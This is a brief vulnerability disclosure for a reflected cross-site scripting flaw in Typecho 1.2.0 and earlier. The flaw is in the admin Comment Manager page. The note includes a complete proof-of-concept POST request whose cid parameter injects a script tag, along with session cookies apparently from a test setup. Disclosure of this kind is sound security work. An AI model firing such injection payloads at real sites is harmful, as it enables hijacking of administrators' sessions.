Description
Typecho admin backend Comment Manager /admin/manage-comments.php
with reflected-XSS via unfiltered POST parameter cid
.
Affected Version
Typecho <= 1.2.0
POC
- Login to typecho admin backend management system.
- In Comment Manager
/admin/manage-comments.php
, the unfiltered $request->cid
is directly echoed to html.
The full POC request:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
| POST /cms/typecho/admin/manage-comments.php?status=wating&category=&keywords=abc&__typecho_all_posts=off&uid= HTTP/1.1 Host: 192.168.0.10 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.0.10/cms/typecho/admin/login.php?referer=http%3A%2F%2F192.168.0.10%2Fcms%2Ftypecho%2Fadmin%2Fmanage-comments.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: 745020ecd4b17dde48d43755702a78b4__typecho_uid=1; 745020ecd4b17dde48d43755702a78b4__typecho_authCode=%24T%249aGUcl7K02f405471bbdacf65892bf8ffb75bc211; PHPSESSID=m7h7isuus6cugk6mb58vdah296; u5DD_2132_saltkey=ql9191Ym; u5DD_2132_lastvisit=1677486351; u5DD_2132_seccodecSASGLE52ETX=1.1b4fba6d0be0f7dce2; u5DD_2132_ulastactivity=dd6b5bfUH2dwkFNJ5HnOvs2bnRKl16bY2TMsiYWsOsPOeru7pyMl; u5DD_2132_auth=ade9wjKb33QiAdI8RrnDloFyK4vB8ca3sx7pIgT0BNlWPo1CeA%2Bsk87ST8rZ%2FVqZTdeIhOInVMfZCF8zm7uu; u5DD_2132_lastcheckfeed=1%7C1677489964; u5DD_2132_nofavfid=1; u5DD_2132_home_diymode=1; u5DD_2132_visitedfid=2; u5DD_2132_smile=1D1; u5DD_2132_home_readfeed=1677497943; u5DD_2132_forum_lastvisit=D_2_1677498054; u5DD_2132_st_t=1%7C1677498055%7C9149ebde1ec47006277ae3faf93f0e2f; u5DD_2132_editormode_e=1; u5DD_2132_st_p=1%7C1677498095%7C926ebc78300a154f5ad9ebb023eb0b77; u5DD_2132_viewid=tid_1; u5DD_2132_seccode=5.792e3c6d8b004d4403; u5DD_2132_seccodecSE52ETX=6.a73b7daa353701b59a Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 44
coid[]=1&cid="><script>alert(1)</script>
|
Reference
Reported by Srpopty, vulnerability discovered by using Corax.